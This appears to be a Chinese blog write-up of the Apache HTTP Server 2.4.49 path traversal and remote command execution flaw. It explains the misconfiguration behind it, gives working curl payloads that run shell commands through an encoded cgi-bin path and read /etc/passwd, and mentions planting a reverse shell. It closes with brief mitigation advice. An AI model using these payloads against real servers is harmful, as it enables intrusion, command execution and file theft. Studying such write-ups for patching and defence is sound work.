Apache HTTP Server 2.4.49 路径穿越,远程命令执行漏洞


项目场景:

Apache HTTP Server 2.4.49,2.5.0

问题描述:

攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。

原因分析:

远程命令执行
在httpd.conf的文件中的这俩配置,导致任意请求都能访问根目录,和cgi-bin目录。
CGI是一段程序,它运行在Server上,提供同客户端 Html页面的接口。如果它能目录穿越了,我们就可以到bin目录下的sh文件/bash文件(系统命令执行文件)里面去执行脚本,而脚本内容就是我们用POST传进去的内容。就相当危险了。

在这里插入图片描述
在这里插入图片描述
payload:curl -X POST -d “echo;id” http://ip:port/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
或者利用bash命令写入一个木马回弹shell。
目录穿越
对于没有进行安全配置的Apache服务器,默认情况可以用xxx.com/icons/的方式打开Apache目录下的icons文件夹,并且会罗列出文件列表,这样很不安全。
在/apache2/conf/extra目录下,配置了icons的权限。也是允许所有进行访问,并且当用户访问该目录时,如果用户找不到DirectoryIndex指定的主页文件(例如index.html),则返回该目录下的文件列表给用户。
在这里插入图片描述
就导致了,直接访问icons会显示该目录底下的文件。

例如:命令curl http://xxxxx:xxxx/icons/
在这里插入图片描述
payload:curl http://ip:port/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

解决方案:

在配置文件中指定可以访问目录的ip,并且指定访问CGI的ip。

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

熊是本熊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值